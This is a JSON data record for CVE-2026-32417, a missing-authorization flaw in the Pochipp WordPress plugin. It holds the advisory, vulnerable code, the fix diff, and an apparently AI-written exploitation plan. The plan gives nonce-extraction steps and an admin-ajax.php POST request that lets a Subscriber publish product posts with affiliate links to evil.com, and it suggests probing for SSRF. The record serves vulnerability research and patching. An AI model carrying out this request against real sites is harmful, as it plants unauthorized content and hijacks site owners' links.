[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPsyFLwfq8QaCPWddqCBz254GKTR8iyX2F2Z-uSQY_8k":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-32417","pochipp-missing-authorization-2","Pochipp \u003C 1.18.9 - Missing Authorization","The Pochipp plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to 1.18.9. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","pochipp",null,"\u003C1.18.9","1.18.9","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-25 00:00:00","2026-04-15 21:00:53",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbbc60271-5f22-48fe-8f56-a66549daf638?source=api-prod",50,[22,23,24],"inc\u002Fajax.php","pochipp.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-32417 (Pochipp Missing Authorization)\n\n## 1. Vulnerability Summary\nThe Pochipp plugin for WordPress (versions \u003C 1.18.9) contains a missing authorization vulnerability in its AJAX handlers. Specifically, functions registered to `wp_ajax_pochipp_update_data` and `wp_ajax_pochipp_registerd_by_block` perform a nonce check but fail to implement a capability check (e.g., `current_user_can()`). This allow any authenticated user, including those with Subscriber-level privileges, to create new Pochipp product posts or update product data.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `pochipp_registerd_by_block` (High Impact) and `pochipp_update_data` (Medium Impact).\n- **Authentication**: Authenticated (Subscriber+).\n- **Payload Parameter**: \n    - `action`: `pochipp_registerd_by_block`\n    - `nonce`: A valid WordPress nonce for the action.\n    - `attributes`: A JSON-encoded string containing product data.\n    - `clientId`: A string identifier used for the post title fallback.\n- **Preconditions**: The attacker must be logged in to the WordPress site.\n\n## 3. Code Flow\n1. **Entry Point**: A POST request is sent to `admin-ajax.php` with `action=pochipp_registerd_by_block`.\n2. **Hook Registration**: In `inc\u002Fajax.php`, `add_action( 'wp_ajax_pochipp_registerd_by_block', '\\POCHIPP\\registerd_by_block' )` routes the request.\n3. **Nonce Check**: The function `\\POCHIPP\\registerd_by_block` calls `\\POCHIPP\\check_ajax_nonce()`. This function verifies the `nonce` parameter against `\\POCHIPP::NONCE_KEY`.\n4. **Missing Check**: The function proceeds directly to process input without calling `current_user_can()`.\n5. **Data Processing**: \n    - The `attributes` parameter is retrieved and JSON-decoded.\n    - `pid` (Post ID) is checked; if present, it returns an error (preventing updates via this specific function, but allowing creation).\n    - Meta fields like `className`, `pid`, `hideInfo`, etc., are unset from the array.\n6. **Sink (Post Creation)**: `wp_insert_post()` is called with `post_type` set to `\\POCHIPP::POST_TYPE_SLUG` (typically `pochipp`) and `post_status` set to `publish`.\n7. **Sink (Meta Storage)**: `update_post_meta()` is called using `\\POCHIPP::META_SLUG` to store the remaining `attributes` as a JSON string.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required. Based on standard Pochipp behavior, nonces are localized for the block editor. \n\n1. **Identify Script Localization**: The plugin likely uses `wp_localize_script` to pass a nonce to the editor. We need to find the variable name.\n2. **Strategy**:\n    - Create a Subscriber user.\n    - Log in as the Subscriber.\n    - Navigate to the WordPress Dashboard (`\u002Fwp-admin\u002F`).\n    - Since the block editor scripts are often enqueued for all users who can access the dashboard or specific post-editing screens, check for a global variable.\n    - Search for a script containing `pochipp`. The common localization object name is likely `pochipp` or `pochipp_data` (inferred).\n    - Use `browser_eval` to find the nonce:\n      ```javascript\n      \u002F\u002F Search for any object containing the nonce\n      Object.keys(window).find(key => window[key] && window[key].nonce);\n      \u002F\u002F or specifically\n      window.pochipp?.nonce\n      ```\n    - Based on `inc\u002Fajax.php`, the default nonce key is `\\POCHIPP::NONCE_KEY`.\n\n## 5. Exploitation Strategy\n### Goal: Create an unauthorized product post.\n\n1. **Setup**: Authenticate as a Subscriber.\n2. **Extraction**: Extract the nonce from the `wp-admin` dashboard source or via `browser_eval`.\n3. **Request**:\n   - **URL**: `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Method**: `POST`\n   - **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body**:\n     ```\n     action=pochipp_registerd_by_block&nonce=\u003CEXTRACTED_NONCE>&clientId=exploit_client&attributes={\"title\":\"Malicious Product\",\"amazon_url\":\"https:\u002F\u002Fevil.com\u002Fref=hack\",\"rakuten_url\":\"https:\u002F\u002Fevil.com\u002Frakuten\"}\n     ```\n4. **Response**: A successful response will return a JSON object with the new post ID: `{\"pid\":123}`.\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `subscriber` role.\n2. **Plugin Configuration**: No specific configuration is needed, but the plugin must be active so that the `pochipp` post type is registered.\n\n## 7. Expected Results\n- The `admin-ajax.php` response should be a JSON object containing a `pid` (e.g., `{\"pid\": 105}`).\n- The response code should be `200 OK`.\n- Accessing `wp-admin` (as an admin) and checking the Pochipp product list should show a new entry titled \"Malicious Product\".\n\n## 8. Verification Steps\n1. **Check Post Existence**:\n   ```bash\n   wp post list --post_type=pochipp --fields=ID,post_title,post_status\n   ```\n   (Verify the new ID and title exist).\n2. **Check Meta Data**:\n   ```bash\n   wp post meta get \u003CNEW_PID> pochipp_data\n   ```\n   (Verify the JSON-encoded URLs\u002Fattributes were saved).\n\n## 9. Alternative Approaches\nIf `pochipp_registerd_by_block` fails, attempt exploitation via `pochipp_update_data`:\n- **Action**: `pochipp_update_data`\n- **Body**: `action=pochipp_update_data&nonce=\u003CNONCE>&itemcode=ANY_STRING&searched_at=amazon`\n- **Goal**: This may trigger an SSRF if `\\POCHIPP::get_item_data` fetches external URLs based on the `itemcode`. While the primary vulnerability is Missing Authorization, the logic inside `get_item_data` should be audited for further impact.\n\n**Constants to Verify During Execution**:\n- `\\POCHIPP::POST_TYPE_SLUG` (Likely `pochipp`)\n- `\\POCHIPP::META_SLUG` (Likely `pochipp_data`)\n- `\\POCHIPP::NONCE_KEY` (Likely `pochipp_nonce`)","The Pochipp plugin for WordPress fails to implement capability checks in its AJAX handlers, allowing authenticated users with Subscriber-level permissions to create or update product posts. By exploiting the 'pochipp_registerd_by_block' or 'pochipp_update_data' actions, an attacker can inject arbitrary product metadata and publish new items to the site.","\u002F\u002F inc\u002Fajax.php line 44\nadd_action( 'wp_ajax_pochipp_update_data', '\\POCHIPP\\update_data' );\nfunction update_data() {\n\n\tif ( ! \\POCHIPP\\check_ajax_nonce() ) {\n\t\twp_die( json_encode( [\n\t\t\t'error' => [\n\t\t\t\t'code'    => 'nonce error',\n\t\t\t\t'message' => '不正なアクセスです。',\n\t\t\t],\n\t\t] ) );\n\t};\n\n\t\u002F\u002F ... processes data ...\n\n\twp_die( json_encode( [\n\t\t'data' => $datas[0],\n\t] ) );\n}\n\n---\n\n\u002F\u002F inc\u002Fajax.php line 91\nadd_action( 'wp_ajax_pochipp_registerd_by_block', '\\POCHIPP\\registerd_by_block' );\nfunction registerd_by_block() {\n\n\tif ( ! \\POCHIPP\\check_ajax_nonce() ) {\n\t\twp_die( json_encode( [\n\t\t\t'error' => [\n\t\t\t\t'code'    => 'nonce error',\n\t\t\t\t'message' => '不正なアクセスです。',\n\t\t\t],\n\t\t] ) );\n\t};\n\n\t$datas     = [];\n\t$attrs     = \\POCHIPP\\get_sanitized_data( $_POST, 'attributes', 'text', '' );\n\t$client_id = \\POCHIPP\\get_sanitized_data( $_POST, 'clientId', 'text', '' );\n\n\t\u002F\u002F ... processes attributes ...\n\n\t$new_id = wp_insert_post( [\n\t\t'post_type'      => \\POCHIPP::POST_TYPE_SLUG,\n\t\t'post_title'     => $title,\n\t\t'post_content'   => '\u003C!-- wp:pochipp\u002Fsetting \u002F-->',\n\t\t'post_status'    => 'publish',\n\t\t] );\n\n\t\u002F\u002F ... updates meta ...\n\n\tupdate_post_meta( $new_id, \\POCHIPP::META_SLUG, json_encode( $attrs, JSON_UNESCAPED_UNICODE ) );\n\n\twp_die( json_encode( [\n\t\t'pid' => $new_id,\n\t] ) );\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpochipp\u002F1.18.8\u002Finc\u002Fajax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpochipp\u002F1.18.9\u002Finc\u002Fajax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpochipp\u002F1.18.8\u002Finc\u002Fajax.php\t2026-02-23 01:32:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpochipp\u002F1.18.9\u002Finc\u002Fajax.php\t2026-02-23 01:42:50.000000000 +0000\n@@ -25,6 +25,30 @@\n \treturn false;\n }\n \n+\u002F**\n+ * ポチップ商品の作成・公開権限があるか\n+ *\u002F\n+function can_create_pochipp_item() {\n+\n+\t$post_type_object = get_post_type_object( \\POCHIPP::POST_TYPE_SLUG );\n+\n+\tif ( ! $post_type_object || empty( $post_type_object->cap ) ) {\n+\t\treturn current_user_can( 'publish_pages' );\n+\t}\n+\n+\tif ( ! empty( $post_type_object->cap->create_posts ) ) {\n+\t\t$create_cap = $post_type_object->cap->create_posts;\n+\t} elseif ( ! empty( $post_type_object->cap->edit_posts ) ) {\n+\t\t$create_cap = $post_type_object->cap->edit_posts;\n+\t} else {\n+\t\t$create_cap = 'edit_pages';\n+\t}\n+\n+\t$publish_cap = ! empty( $post_type_object->cap->publish_posts ) ? $post_type_object->cap->publish_posts : 'publish_pages';\n+\n+\treturn current_user_can( $create_cap ) && current_user_can( $publish_cap );\n+}\n+\n require_once POCHIPP_PATH . 'inc\u002Fajax\u002Fauto_update.php';\n require_once POCHIPP_PATH . 'inc\u002Fajax\u002Fsearch_amazon.php';\n require_once POCHIPP_PATH . 'inc\u002Fajax\u002Fsearch_rakuten.php';\n@@ -72,6 +96,15 @@\n add_action( 'wp_ajax_pochipp_registerd_by_block', '\\POCHIPP\\registerd_by_block' );\n function registerd_by_block() {\n \n+\tif ( ! \\POCHIPP\\can_create_pochipp_item() ) {\n+\t\twp_die( json_encode( [\n+\t\t\t'error' => [\n+\t\t\t\t'code'    => 'forbidden',\n+\t\t\t\t'message' => 'この操作を実行する権限がありません。',\n+\t\t\t],\n+\t\t] ) );\n+\t}\n+\n \tif ( ! \\POCHIPP\\check_ajax_nonce() ) {\n \t\twp_die( json_encode( [\n \t\t\t'error' => [","To exploit this vulnerability, an attacker first authenticates as a Subscriber-level user. They then obtain a valid AJAX nonce by inspecting the localized scripts in the WordPress dashboard (typically associated with the Pochipp block editor script). With this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to 'pochipp_registerd_by_block'. The payload includes the 'nonce' and a JSON-encoded 'attributes' string containing the desired product title and affiliate URLs. Because the plugin does not verify if the user has the 'publish_posts' capability for the Pochipp post type, it will create a new published post containing the attacker's metadata.","gemini-3-flash-preview","2026-04-19 00:36:25","2026-04-19 00:36:54",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.18.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpochipp\u002Ftags\u002F1.18.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpochipp.1.18.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpochipp\u002Ftags\u002F1.18.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpochipp.1.18.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpochipp\u002Ftags"]